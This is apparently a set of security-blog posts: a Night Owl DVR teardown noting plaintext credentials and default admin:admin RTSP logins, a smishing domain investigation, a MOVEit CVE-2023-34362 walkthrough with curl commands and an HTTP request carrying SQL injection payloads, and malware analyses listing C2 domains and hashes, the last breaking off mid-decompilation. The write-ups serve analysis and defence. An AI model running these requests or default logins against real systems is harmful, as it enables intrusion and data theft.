Category: Uncategorized

Analyzing the network traffic pcap led me to see that this “American” company is using a foreign (Taiwanese) P2P network and authentication infrastructure for viewing Night Owl streams via their CMS app. I don’t like it. However, it network traffic didn’t tell me why I can’t view live/recorded video playback in the Windows application. So, this requires a deepdive into the application logs. I also want to understand how the executable works and want to learn how to use Ghidra/reverse engineer more in depth.

Application Logs

I copied the program parent directory over to my linux machine for analysis. Navigated to ..\OprLog and found the app log files. During inspection of an entire log file, I found no errors regarding video playback. But, interestingly enough, Night Owl stores credentials in plaintext!!!

It’s 2024, people. Can we not store creds in plaintext, please??

But, alas, since I still did not find any ERROR messages regarding playback, it is time to dig into reverse engineering the firmware.

Ghidra

My DVR version is DVR-FTD4-8. I downloaded the firmware file from here: https://support.nightowlsp.com/hc/en-us/articles/13090197774747-FTD4-Series

Next, I attempted to import the firmware bin into Ghidra, but found that I did not know the architecture. I could make an educated guess, but really had no idea what DVR systems use for processors.

So, I attempted attach a keyboard to the device, reboot the DVR, and spam any and all the keys that would result in accessing the bootloader in order to find the specific processor architecture. But no such luck occurred.

I ended up pulling the plug on the DVR and opening up the case.

Unfortunately, the processor is covered with the heat sink. Next best thing is to look up the board schematics to see if there are correlating FCC documents showing specific processors. Motherboard is AHB8008T-NB-T36-OWL v1.02.

I found an FCC document for the bluetooth chip radiation evaluation. However, this does not provide any schematics or information on the processor.

There is no information on this specific OWL-branded board, so I queried for only AHB8008T and found that there are various security camera DVRs using this parent board. This resulted in me finding a CVE referencing this board and its manufacturer, that the manufacturer Xiongmai.

I searched for Xiongmai plus the board name and found that it uses a Hisilicon Hi3531D:

The above documentation explains that this processor uses ARM Cortex A9@1.4 GHz. I imported it as ARM Cortex (little endian).

Conclusion of Part One

I now have the firmware loaded into Ghidra. I also already have the exe and all dlls ready for import. Does the firmware contain any helpful information for me to find out why I’m experiencing the black video playback? Probably not. But I want experience in reverse engineering firmware.

Most likely the video playback error will be found in a dll and referenced in the exe. But I am also interested in finding security vulnerabilities in this product (such as the plaintext credentials) since I use this to help secure my home. And I’m also interested in finding how much of what is being sent to foreign companies and governments (and possible adversaries). Then I want to find these devices on shodan to see if I can exploit their p2p protocol.

Home security camera systems that offer ONLY offline DVR, wired cameras on a LAN — with the capability to port forward video streams to a mobile app — are non-existent. Every single “security” company offering “security” cameras all require to connect to their companies’ cloud servers — even if their product is wired to your LAN and an offline DVR storage. I hate it. But I had to get something, so I picked up Night Owl Protect from Costco back in Summer 2023.

The iOS app is fine. The MacOS app is fine. I hate how it has no web browser app (hate it). But the Windows app, which I presumed would work better than Apple, doesn’t work. Below are the relevant details:

• Issue: Video playback boxes for both live and recorded video are black frames
• OS Version: Windows 11 Pro 24H2 26100.2605
• CMS Version: 1.0.22.T.20230912
• Night Owl Protect Model: DVR-FTD4-8_1.2.4

Analysis

Wireshark PCAP

DNS query is made to ota.no-protect.com. VirusTotal shows that this a domain associated with Night Owl in order to manage devices and your account via the browser. However, no way to view video. This DNS request responds with .kota.kalayservice.com. This refers to Kalay Developer Console (KDC)”which is a tool from TUTK that provides smart device development tools, records, and documentation.” Kalay is developed by TUTK (ThroughTek Co) to be a platform for iOT devices and cloud video management.

During the authentication phase, the application calls out to all-c-master-NightOwl.iotcplatform.com. It is owned by ThroughTek and used for the remote access of AV streams. It is used for “punching” through NAT via the iotcplatform library in order to make it “user friendly” (hate it).

iotcplatform, kalay, and ThroughTek are all part of the same Taiwanese (probably Chinese) company umbrella of ThroughTek Co, Ltd. IOTCPlatform is the networking infrastructure. Kalay is the P2P software infrastructure.

Funny side note: Night Owl SP, LLC was sold in 2020 to SFP Holding, Inc. Then in 2021, BlackRock acquired a majority interest in Summit.

I’m pretty sure I found a useful error RTSP packet. Namely an invalid sample rate of 90000 for H265 codec.

I think the application is having a hard time running the h.265 codec, namely because there’s another RTP packet seemingly trying to enforce h.264. (Also, don’t mind the user and password in the RTSP URI. It’s only for that local client with a specific token. It’s not for the actual stream.)

I was able to test the RTSP stream on VLC on my linux desktop. Turns out Night Owl uses the default RTSP credentials of admin:admin. And if the streamer has multiple cameras, make sure to specify channel=. You can also specify if you want video and/or audio by using stream=1 or 0 and audio=1 or 0.

Anyways, I did check the specs on my Windows machine, and the CPU is an Intel Celeron N5095. According to Intel, it does support HEVC/h.265 via its Quick Sync Video capability. Though, there are those who have had mixed luck with the codec.

Initial Conclusion

I’m with you @Flintsone61. I feel ya.

Could be H.265/HEVC related since it was working on my Windows machine, but now it’s not. Unsure. I’ll be taking a look at the application logs in part two. I did find they store credentials in plaintext, which is fun…

Most days I ignore, delete, and/or block phishing emails or smishing messages. However, let’s dig into one to see what we can find.

Phone Number

A quick Google search shows that +63 is a Philippines country code. Hopefully this is an immediate signal that it is a phishing attempt.

No results for the full phone number shows up anymore. Honestly, it’s probably a throw-away number.

URL Analysis

I put the URL into URLScan: https://urlscan.io/result/e478ca5f-d6f8-424b-b25f-afab8cc38236/

Results show no redirections but straight to a landing page for the ezdrivema[.]com-siiiic[.]top domain.

We can see the page is a clone of the Massachusetts’ Department of Transportation EZPass program: https://www.mass.gov/ezdrivema. Funny enough, their website is alerting against this smishing attack:

The URLScan result shows a POST form /ezpassmalogin that is associated with the whole page whenever the user clicks on the button. However, all other links on the page lead to the legitimate MA DOT page. I’m not sure what all the javascript is doing, but it looks like it could be a “man in the middle” type scenario.

I also tried to access the URL via AnyRun, but it could not reach it.

VIrusTotal results are below:

0/94, https://www.virustotal.com/gui/domain/ezdrivema.com-xiiiic.top

5/96, https://www.virustotal.com/gui/url/28782f6b4692ca68adc1cc37ca2182ddcc10ad48fb3237aed1494b951bd1094b

Looks like even VirusTotal returns a 404 error. I think the URLScan results are cached from when a different user scanned it before the attacker took down the domain.

The domain was served by 47.89.248[.]140. This is a domestic geolocated IP address and owned by Alibaba cloud services. NSlookup shows that the IP serves also the following domains:

ezdrivema[.]com-xiiiic[.]top
ezdrivema[.]com-xiiiir[.]top
ezdrivema[.]com-xiiiij[.]top
ezdrivema[.]com-heeeq[.]top
ezdrivema[.]com-xiiiif[.]top
ezdrivema[.]com-xiiiia[.]top
ezdrivema[.]com-heeet[.]top
ezdrivema[.]com-xiiiin[.]top
ezdrivema[.]com-heeec[.]top
ezdrivema[.]com-xiiiiq[.]top
ezdrivema[.]com-xiiiik[.]top
ezdrivema[.]com-xiiiib[.]top
ezdrivema[.]com-heeez[.]top
ezdrivema[.]com-heeef[.]top
ezdrivema[.]com-youshz[.]top
ezdrivema[.]com-gdsgdff[.]top
ezdrivema[.]com-youshc[.]top
ezdrivema[.]com-guonix[.]top
ezdrivema[.]com-youshs[.]top
ezdrivema[.]com-gdsgdfa[.]top
ezdrivema[.]com-gdsgdfd[.]top
ezdrivema[.]com-guonib[.]top
ezdrivema[.]com-youshe[.]top
ezdrivema[.]com-gdsgdfz[.]top
ezdrivema[.]com-guonia[.]top
ezdrivema[.]com-guonis[.]top
ezdrivema[.]com-gdsgdfr[.]top
ezdrivema[.]com-youshq[.]top
ezdrivema[.]com-guonif[.]top
ezdrivema[.]com-guonit[.]top
ezdrivema[.]com-gdsgdfq[.]top
ezdrivema[.]com-gdsgdfe[.]top
ezdrivema[.]com-guoniz[.]top
ezdrivema[.]com-youshx[.]top
ezdrivema[.]com-guonih[.]top
ezdrivema[.]com-gdsgdfc[.]top

Looks like the scammers are varying the parent domain pattern. This IP address also has a pattern of phishing websites before 2023. However, all of them also seem to be HTTP status 404.

Conclusion

I have a virtual sms number to be used for testing smishing attackers, but I’m not ready to pay for international texts.

And all the domains are already down by the attacker.

Another classic example of a third-party breach ruining it for the rest of us.

On 22 December 2023, the Denver-based wellness company, Welltok, sent a letter to the Attorney General of Connecticut , informing him of 847,356 CT residents’ compromised health data.

The letter describes that the real compromise occurred in May 2023 when a Threat Actor (TA) utilized the then unknown MOVEit zero-day vulnerability to exfiltrate customer data from the file server. Sadly, there was nothing that Welltok could’ve done to mitigate an unknown zero day. Although, Welltok’s SOC or CyberInfra team (whatever it may be) could have had specific alerts for anomalous data exfiltration of sensitive data (i.e., customer PHI) from important data file servers and modification of accounts to sysadmin level privileges.

Below is how it would’ve gone down.

Reconnaissance (TA0043)

TA scans the public-facing servers with various fingerprints T1595.003 — whether manually (e.g., curl -v -I command), homemade scanner bot, or premium service (i.e., Censys, Shodan, etc.). Possible fingerprints could be:

• /human.aspx indicates Progress MOVEit Transfer login form
• Header including Server: Progress MOVEit
• Possible HTML title tag including MOVEit Transfer

Initial Access (TA0001)

Exploit Public Facing Application (T1190)

TA sends HTTPS GET request to populate the ASP.NET_SessionId cookie in order to start a session with the server:

$ curl -I https://moveit.example.com
...
set-cookie: ASP.NET_SessionId=yxg0zv4pkpkqoobio0uoe2zf;
...

Next, the TA uses a vulnerability in the MOVEitISAPI.dll to set session variables for the session:

curl -H "xx-silock-transaction: folder_add_by_path" -H "X-siLock-Transaction: session_setvars" -I https://moveit.example.com/moveitisapi.dll?action=m2

To explain, m2 is an action parameter in the compiled dll. When it is called, it allows for the folder_add_by_path value to be set to the X-siLock-Transaction header. However, when this header is called (X-siLock-Transaction: folder_add_by_path) ISAPI (Internet Server API) [which filters calls to the Microsoft IIS web server’s ASP.NET application] will read the header field case insensitive and within a larger string, whereas .NET requires it to be case sensitive. This means the ISAPI can pass multiple x-silock-transaction header values with the second header being the only one ready by the .NET server.

MOVEit accepts X-SILOCK-* headers and the aforementioned dll accepts custom headers, which is what the transaction session_setvars allows. For example:

POST /MOVEitISAPI/MOVEitISAPI.dll?action=m2 HTTP/1.1
Host: 192.168.37.144
Connection: close
XX-siLock-Transaction: folder_add_by_path
X-siLock-Transaction: session_setvars
X-siLock-SessVar1: MyUsername: Guest
X-siLock-SessVar2: MyPkgValidationCode: 1
X-siLock-SessVar3: MyInstMessaging: 1
X-siLock-SessVar4: MyGuestEmailAddr: x@example.com
X-siLock-SessVar5: MyPkgID: 0
X-siLock-SessVar6: MyPkgSelfProvisionedRecips: x' or 1=1) LIMIT 1; -- a
X-siLock-SessVar7: MyPkgAccessCode: 1'; update users set notes='pwned' where loginname='sysadmin'; -- a
Cookie: ASP.NET_SessionId=21ts1wiqbftjbjqjbrnjbuxj; siLockLongTermInstID=0
Content-Length: 0

In this case, the TA submits a SQL injection using the earlier Guest credentials to create new sysadmin user with admin level permissions by targeting the activesessions table.

Finally, to maintain the session for further access, a POST request to retrieve the CSRF token. Ensure Transaction is set to dummy, Arg06 is set to anything, and Arg12 is set to promptaccesscode:

$ curl -ski 'https://moveit.example.com/guestaccess.aspx?Transaction=dummy&Arg06=accesscode&Arg12=promptaccesscode' | grep csrf
[...]
<input type="hidden" name="csrftoken" value="44ad7cfa2e1a73b7a636c0bb0f9ff8d8b8e4239d">
[...]

Persistence (TA0003)

Web Shell (TA1505.003)

Once admin level permissions is achieved, the TA uploads a reverse web shell into the new sysadmin account’s API directory structure. Ensure the uploadType is set to resumable:

POST https://moveit.example.com/api/v1/folders/{id}/files?uploadType=resumable

The file will be encrypted in the fileupload database table, but it can be deserialized. Once done, the web shell file is ready to go.

Conclusion

The MOVEit Transfer attack was a complex hack that affected a lot of orgs in the Federal government and in DoD. It was not a trivial happenstance. However, I hope this helped understand it a bit more.

For more in-depth analysis of the software and the possible exploitation path, please refer to Assetnote’s and Rapid7’s work:

https://www.assetnote.io/resources/research/moveit-transfer-rce-part-two-cve-2023-34362

https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis?referrer=etrblog

This is more or less a part three to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

+47ms	File drops C:\Users\admin\lzmjqt.exe
+63ms	lzmjqt.exe writes a new shell key to WinLogon registry
+218ms	Creates process svchost.exe
+281ms	svchost.exe runs file C:\Users\admin\lzmjqt.exe
+1313ms	DNS request to slade.safehousenumber[.]com
+31039ms	murik.portal-protection[.]net[.]ru
+60758ms	world.rickstudio[.]ru
+91480ms	banana.cocolands[.]su
+121s	DNS request to portal.roomshowerbord[.]com
+150s	DNS request to slade.safehousenumber[.]com
+271s	DNS request to portal.roomshowerbord[.]com

The executable drops the lzmjqt.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates a svchost.exe process. The svchost.exe then runs the dropped file. This malware then reaches out to its C2 domains — slade.safehousenumber[.]com and portal.roomshowerbord[.]com.

AnyRun captured a pcap and the DNS output is such:

The first request sent to safehousenumber (44.221.84[.]105)received a response, containing the following bytes:

The second request is sent to portal.roomshowerbord[.]com (193.166.255[.]171) and the response is received, containing the following bytes:

Reverse engineering the malware with Ghidra gives the following decompilation:

void entry(void)

{
  undefined4 *puVar1;
  undefined4 extraout_ECX;
  undefined4 extraout_EDX;
  byte *pbVar2;
  char **local_74;
  _startupinfo local_70;
  int local_6c;
  char **local_68;
  int local_64;
  _STARTUPINFOA local_60;
  undefined *local_1c;
  void *pvStack_14;
  undefined *puStack_10;
  undefined *puStack_c;
  undefined4 local_8;
  
  puStack_c = &DAT_0040f058;
  puStack_10 = &DAT_0040e0a8;
  pvStack_14 = ExceptionList;
  local_1c = &stack0xffffff74;
  local_8 = 0;
  ExceptionList = &pvStack_14;
  __set_app_type(2);
  _DAT_00411de8 = 0xffffffff;
  _DAT_0040f030 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_0040f040;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_0040f020;
  _DAT_00411ddc = *(undefined4 *)_adjust_fdiv_exref;
  FUN_0040e07a();
  if (DAT_00411de4 == 0) {
    __setusermatherr(&DAT_004185c4);
  }
  FUN_0040e07a();
  _initterm(&DAT_0040f03c,&DAT_0040f03c);
  local_70.newmode = DAT_00411dd0;
  __getmainargs(&local_64,&local_74,&local_68,DAT_00411de0,&local_70);
  _initterm(&DAT_0040f03c,&DAT_0040f03c);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_0040e01b;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_0040e01b;
  do {
    pbVar2 = pbVar2 + 1;
LAB_0040e01b:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_60.dwFlags = 0;
  GetStartupInfoA(&local_60);
  GetModuleHandleA((LPCSTR)0x0);
  local_6c = FUN_0040dee8(extraout_ECX,extraout_EDX);
                    /* WARNING: Subroutine does not return */
  exit(local_6c);
}

This executable function is the runtime startup routine that:

1. Sets up exception handling.
2. Configures the application type as a console app.
3. Initializes global variables (e.g., file mode, floating-point settings).
4. Runs initializers (e.g., C++ constructors) via _initterm.
5. Retrieves and parses command-line arguments.
6. Gathers startup information.
7. Calls the user-defined main function (FUN_0040dee8).
8. Exits with main’s return value.

We would need the dropped binary to see what the real malware does.

OSINT

Filename	7zsfx.exe
VirusTotal Score	18/43
MD5	3aeb8c1edb3810196a3eff1c7a4188b2
SHA1	f117f6cbdc33cace7ee8026f8eebfc7a04a58a3c
SHA256	0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

VirusTotal upload shows the file is not signed but has a Product description of “Trend Micro AntiVirus Plus AntiSpyware”. It is categorized as part of the armadillo malware family.

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
URLScan reaches the domain but produces a blank white page: https://urlscan.io/result/019567f0-6bd6-7669-976e-9da47cfe8b30/

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105
IP is AWS owned and serves many other domains — both legitimate and malicious.
URLScan also shows a blank page: https://urlscan.io/result/01956809-0a45-7eed-925f-fe6e637b1665/

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Known malware C2 domain.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Large Finnish ISP that provides hundreds of resolutions.
URLScan shows the IP does not provide a web page: https://urlscan.io/result/01956a2a-e667-7bb8-9f13-23e97f7e4d0f/

Conclusion

Malware reaches out to C2 for second stage but these are no longer functioning — even though the domains are still alive.

IOCs

44.221.84[.]105

193.166.255[.]171

portal.roomshowerbord[.]com

slade.safehousenumber[.]com

0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

This is more or less a part two to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

shakira.exe loads the following dlls in chronological order:

• +46ms
  • ntdll.dll
  • kernel32.dll
• +62 ms
  • KernelBase.dll
  • user32.dll
  • gdi32.dll
  • lpk.dll
  • usp10.dll
  • msvcrt.dll
• +78 ms
  • C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
  • advapi32.dll
  • sechost.dll
  • rpcrt4.dll
  • loeaut32.dll
  • ole32.dll
  • shell32.dll
  • shlwapi.dll
  • imm32.dll
  • msctf.dll
• +203 ms
  • apphelp.dll
• +218 ms
  • svchost.exe

The executable runs process svchost.exe. The process drops another executable: C:\Users\admin\xuat.exe. Then xuat.exe writes to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the value explorer.exe,C:\Users\admin\xuat.exe and named Shell. The dropper did this in order to keep persistence at restart and logon. The process then reads many various registry entries regarding network connections.

At +906 ms the process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com). The process sends 21 bytes of data via UDP protocol:

At +120 seconds, the xuat.exe process creates a connection to 193.166.255[.]171:33111 (portal.roomshowerbord[.]com). The process sends 21 bytes of data via UDP protocol.

At +128 seconds, the Windows Media Player Network Sharing Service Configuration Application (C:\Program Files\Windows Media Player\wmpnscfg.exe)runs in the background and gathers client information (reads computer name, checks supported languages, and other sysinfo).

At +151 seconds, the xuat.exe process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com). The process sends 21 bytes of data via UDP protocol:

The malware seems to gather system information and send it to C2 servers.

Ghidra produced the following decompiled output:

void entry(void)

{
  undefined4 *puVar1;
  undefined4 extraout_ECX;
  uint extraout_EDX;
  byte *pbVar2;
  char **local_74;
  _startupinfo local_70;
  int local_6c;
  char **local_68;
  int local_64;
  _STARTUPINFOA local_60;
  undefined *local_1c;
  void *pvStack_14;
  undefined *puStack_10;
  undefined *puStack_c;
  undefined4 local_8;
  
  puStack_c = &DAT_00412058;
  puStack_10 = &DAT_0041148c;
  pvStack_14 = ExceptionList;
  local_1c = &stack0xffffff6c;
  local_8 = 0;
  ExceptionList = &pvStack_14;
  __set_app_type(2);
  _DAT_00412038 = 0xffffffff;
  _DAT_00412078 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_0041214c;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_0041206c;
  _DAT_00412070 = *(undefined4 *)_adjust_fdiv_exref;
  FUN_0041147b();
  if (DAT_0041208c == 0) {
    __setusermatherr(&DAT_00412254);
  }
  FUN_0041147b();
  _initterm(&DAT_00412090,&DAT_00412090);
  local_70.newmode = DAT_00412020;
  __getmainargs(&local_64,&local_74,&local_68,DAT_00412080,&local_70);
  _initterm(&DAT_00412090,&DAT_00412090);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_0041140f;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_0041140f;
  do {
    pbVar2 = pbVar2 + 1;
LAB_0041140f:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_60.dwFlags = 0;
  GetStartupInfoA(&local_60);
  GetModuleHandleA((LPCSTR)0x0);
  local_6c = FUN_004109ec(extraout_ECX,extraout_EDX);
                    /* WARNING: Subroutine does not return */
  exit(local_6c);

OSINT

shakira.exe
a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
53/64, https://www.virustotal.com/gui/file/a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
Associated with the Armadillo malware packer.

xuat.exe
a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
Same as/Part of above file.

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
GoDaddy registered domain known for phishing.

murik.portal-protection.net[.]ru
3/94, https://www.virustotal.com/gui/domain/murik.portal-protection.net.ru
Domain registered with Russian registrar RU-CENTER-RU. Known malware domain.

banana.cocolands[.]su
5/94, https://www.virustotal.com/gui/domain/banana.cocolands.su
Registered with NIC.ru domain registrar. Known malware domain.

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Domain registered with GoDaddy. Known malware domain.

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105/details
Supposedly an Amazon domestic IP. But associated with malware.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Finnish IP serving phishing domains.

Conclusion

Definitely similar to naprava.exe. Maybe the same threat actor wrote this malware where I contracted it in the Chisinau, Moldova internet cafe.

Indicators of Compromise

AnyRun Link	https://app.any.run/tasks/abdd8821-c4aa-4f97-9d86-4eb5f1983023
File Path	..\havesit\shakira.exe
File Name	shakira.exe
SHA256	a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
C2 Domain	slade.safehousenumber[.]com
C2 Domain	murik.portal-protection.net[.]ru
C2 Domain	banana.cocolands[.]su
C2 Domain	portal.roomshowerbord[.]com
C2 IP	44.221.84[.]105
C2 IP	193.166.255[.]171

I served a two year ecclesiastical mission in the Republic of Moldova from 2011 to 2013 for the Church of Jesus Christ of Latter-day Saints. I recently dug through boxes of old memories and found SD cards containing photos and videos from those two years in Moldova.

However, after inserting it into my Linux machine’s SD card reader, I found one to contain multiple sub-folders with odd or Russian named Windows executables. These are not part of the SanDisk default directory structure, nor part of the Canon digital camera software directory structure.

File Analysis

../eksplozivna/naprava.exe

Analysis

I uploaded the file to AnyRun: https://app.any.run/tasks/9a5b4267-cc01-40ff-bdef-eff6b1c702a8

The exe called on svchost.exe and loaded the following dlls:

• ntdll.dll
• wow64.dll
• wow64win.dll
• wow64cpu.dll
• kernel32.dll
• KernelBase.dll
• apphelp.dll
• sechost.dll
• rpcrt4.dll
• bcrypt.dll
• ucrtbase.dll

All dlls are legitimately signed.

The exe replaces the legitimate svchost with a modified version. It sends a write event to registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the name Shell. This is a big red flag and looks like it is loading a reverse shell to the logon actions.

The program then uses the malicious svchost process to drop another file: cbzvl.exe

The program uses the WinAPI and queries for system information. Then it creates a UDP connection to 45.144.3[.]149 :6600 (peer.pickeklosarske[.]ru)

• 45.144.3[.]149
  • 1/94, https://www.virustotal.com/gui/ip-address/45.144.3.149/relations
  • HK non-cloud IP that has been serving the same two C2 domains for years:
    • peer.pickeklosarske[.]ru
      • 5/94, https://www.virustotal.com/gui/domain/peer.pickeklosarske.ru
      • known C2
    • jebena.ananikolic[.]su
      • 9/94, https://www.virustotal.com/gui/domain/jebena.ananikolic.su
      • known c2

Connection sends 21 bytes. Nothing decipherable in pcap

Another UDP connection is made with 193.166.255[.]171:6600 (teske.pornicarke[.]com) to send another 21 bytes. Also included are additional 21 byte outbound UDP pakcets.

• 193.166.255[.]171
  • 1/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
  • Finnish IP that serves so many domains. Possibly a legitimate malware sinkhole — or just a lie by a malicious commenter.
• teske.pornicarke[.]com
  • 7/94, https://www.virustotal.com/gui/domain/teske.pornicarke.com
  • Known as a C2 for a UDP-based worm since back in 2010.
• 224.0.0[.]252
  • 0/94, https://www.virustotal.com/gui/ip-address/224.0.0.252
  • pcap payload shows ISATAP IPV6 request. Not malicious.
• 208.100.26[.]242
  • 4/94, https://www.virustotal.com/gui/ip-address/208.100.26.242
  • Known C2 server.

Below are the hash analysis of the files:

• naprava.exe
  • SHA256:c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
  • 68/73, https://www.virustotal.com/gui/file/c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
  • Known as trojan/worm/pua in the malware families palevo, rimecud, and bredolab.
• cbzvl.exe
  • Same as naprava.exe

AnyRun shows the session also reached out to the following IP addresses:

• 184.30.131[.]245
  • 0/94, https://www.virustotal.com/gui/ip-address/184.30.131.245
  • German Akamai IP. Serves digicert and rapidssl.
• 52.149.20[.]212
  • 0/94, https://www.virustotal.com/gui/ip-address/52.149.20.212/relations
  • Microsoft update server. Not malicious.

Ghidra analysis of the malware shows the following decompiled code:

void entry(void)

{
  int in_EAX;
  DWORD DVar1;
  size_t sVar2;
  LPSYSTEMTIME p_Var3;
  int iVar4;
  BOOL BVar5;
  uint uVar6;
  UINT UVar7;
  char extraout_CL;
  ushort extraout_CX;
  short extraout_CX_00;
  undefined4 extraout_ECX;
  uint extraout_ECX_00;
  undefined extraout_DL;
  uint extraout_EDX;
  undefined4 extraout_EDX_00;
  undefined4 extraout_EDX_01;
  uint extraout_EDX_02;
  char *extraout_EDX_03;
  uint extraout_EDX_04;
  int extraout_EDX_05;
  uint extraout_EDX_06;
  uint extraout_EDX_07;
  char *extraout_EDX_08;
  char *extraout_EDX_09;
  uint extraout_EDX_10;
  byte bVar8;
  ushort uVar9;
  uint unaff_EBX;
  ushort uVar10;
  uint unaff_ESI;
  LPSYSTEMTIME p_Var11;
  uint uVar12;
  uint unaff_EDI;
  undefined4 uVar13;
  char cVar14;
  bool bVar15;
  char *pcVar16;
  char *pcVar17;
  char *pcVar18;
  uint local_78;
  LARGE_INTEGER local_70;
  _SYSTEMTIME local_68;
  uint local_58;
  char *local_54;
  uint local_50;
  _SYSTEMTIME local_4c;
  uint local_3c;
  _SYSTEMTIME local_38;
  undefined2 local_28;
  ushort local_24;
  _SYSTEMTIME local_20;
  char *local_10;
  byte local_c;
  byte local_b;
  char local_a;
  undefined local_9;
  LPSYSTEMTIME local_8;
  
  local_8 = (LPSYSTEMTIME)0xfff5abd4;
  if (in_EAX != -0x6f40b600) {
    GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
    unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),CONCAT11(local_c,(char)unaff_EBX));
    DAT_0040a0cc = unaff_EDI;
  }
  GetSystemTime(&SYSTEMTIME_0040a0d0);
  strlen("Rscmc Clf, Nqf. Gau");
  DAT_0040a058 = (undefined2)unaff_EBX;
  uVar12 = DAT_0040a0e0;
  GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
  if (DAT_0040a0cc != unaff_ESI) {
    local_8 = (LPSYSTEMTIME)((int)local_8 + uVar12);
  }
  p_Var11 = (LPSYSTEMTIME)(unaff_ESI & (uint)local_8);
  local_8 = (LPSYSTEMTIME)0x114060;
  DVar1 = GetTickCount();
  if (DVar1 != 0) {
    unaff_EBX = (uint)(char)(unaff_EBX >> 8);
    local_10 = (char *)0x0;
    DAT_0040a05a = extraout_CX;
  }
  cVar14 = local_8 < DVar1;
  local_8 = (LPSYSTEMTIME)((int)local_8 - DVar1);
  uVar13 = CONCAT22((short)(unaff_EDI >> 0x10),DAT_0040a0e4);
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
  GetSystemTime(&local_20);
  local_b = (byte)(unaff_EBX >> 8);
  DAT_0040a0c7 = (DAT_0040a0c7 - extraout_CL) - cVar14;
  DAT_0040a008 = puts("Mojjha Phdr. Ygpa");
  _DAT_0040a0e8 = _DAT_0040a0e8 + -0xbe9620;
  DAT_0040a000 = 0;
  puts("Fbwdc Ymrwoelrx");
  GetOEMCP();
  DAT_0040a008 = uVar13;
  strlen("Oyycv La, Jjpfwl");
  DAT_0040a0e0 = DAT_0040a0e0 | extraout_EDX;
  pcVar16 = "Lpdm, Rgcmnbe Wmslc";
  sVar2 = strlen("Lpdm, Rgcmnbe Wmslc");
  if (((LPSYSTEMTIME)local_10 == p_Var11) &&
     (unaff_EBX = unaff_EBX + (-(uint)(local_10 < p_Var11) - sVar2),
     ((uint)pcVar16 & (uint)p_Var11) == 0)) {
    local_10 = (char *)unaff_EBX;
  }
  sVar2 = strlen("Qlmqipqh Gaxmdj Qwl");
  local_8 = (LPSYSTEMTIME)((uint)local_8 | 0x244);
  _DAT_0040a0e8 = extraout_EDX_00;
  if ((short)sVar2 != DAT_0040a0e6) {
    p_Var3 = &local_20;
    GetSystemTime(p_Var3);
    if (p_Var3 == (LPSYSTEMTIME)0x0) {
      unaff_EBX = unaff_EBX & 0xffff0000;
      _DAT_0040a0ec = extraout_ECX;
    }
    unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),local_28);
  }
  GetSystemTime(&local_38);
  p_Var3 = &local_4c;
  local_3c = (uint)p_Var11;
  GetSystemTime(p_Var3);
  if ((DAT_0040a0c2 == (short)p_Var3) &&
     (p_Var11 = local_8, _DAT_0040a0f4 = extraout_EDX_01, ((uint)p_Var3 & 0xaafae336) == 0)) {
    DAT_0040a00d = DAT_0040a00d + -0x10;
    p_Var3 = DAT_0040a0c8;
    unaff_EBX = DAT_0040a0f0;
  }
  DAT_0040a0cc = extraout_ECX_00;
